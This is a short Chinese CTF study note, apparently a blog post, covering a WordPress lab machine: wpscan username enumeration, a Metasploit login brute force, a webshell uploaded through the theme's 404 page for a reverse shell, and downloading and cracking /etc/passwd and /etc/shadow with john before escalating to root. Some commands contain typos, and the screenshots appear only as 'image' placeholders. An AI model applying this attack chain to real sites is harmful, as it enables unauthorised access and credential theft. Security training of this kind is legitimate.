ctf-web-WEB安全暴力破解(wp破解、passwd和shadow破解)思路笔记

  1. 信息探测

    1. image
    2. 分析结果,挖掘可利用信息
      1. 发现敏感文件,发现登陆界面:image
  2. 使用wpScan对站点用户名进行枚举

    1. 输入wpscan查看可使用的命令image
    2. image
    3. 初次使用wpscan需要更新,过程有点缓慢
    4. 获得用户名:admin
  3. 使用metasploit对wordpress站点进行暴力密码破解

    1. 启动Metasploit –> msfconsole
    2. msf > use auxilicry /scanner/http/wordpress_login_enum
    3. msf auxiliary(wordpress_login_enuml> set username adlmin
    4. msf auxiliary(wordpress_login_enum)> set pass_file /usr/share/wordlists/cirb/common.txt
    5. msf auxiliary(wordpress_login_enum) > set targeturi /secret/
    6. msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
    7. msf cuxiliary(wordpress_login_enum) > run
    8. 获得用户名和密码image
    9. 使用用户名和密码进行登陆
  4. 上传webshell获取控制权

    1. 生成shell:image
    2. 通过404页面上传shell:image
    3. 设置启动监听:image
    4. 访问404.php执行shell,获得反弹shellimage
    5. 查看系统信息sysinfo
    6. 加载shell: shell
    7. id
  5. 使用passwd和shadow提升root权限:

    1. -- Metasploit中利用返回shell下载download /etc/passwd  download /etc/shadow
    2. --将文件转换为join可以识别的文件格式
    3. unshadow passwd shadow > cracked
    4. --使用john破解密码:john crackedimage
    5. shellimage
    6. su- marlinspike
    7. sudo –limage
    8. 获得root:sudo bash
  6. 总结:

    1. 提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
    2. 对于wp的渗透中,启动对应的主题,然后在404页面上传shell;
    3. 渗透流程:发现wordpress-使用wpscan进行用户名枚举-使用msfconsole进行密码爆破-登陆后台-生成shell-启动监听-执行shell-获得反弹shell-下载passwd和shadow-使用passwd和shadow提升root权限-文件转换为join可以识别的文件格式-使用john破解密码-获得用户密码-返回反弹的shell-切换用户-提升权限-获取flag
posted @ 2020-09-01 12:44  Ycdtbest  阅读(931)  评论(0编辑  收藏  举报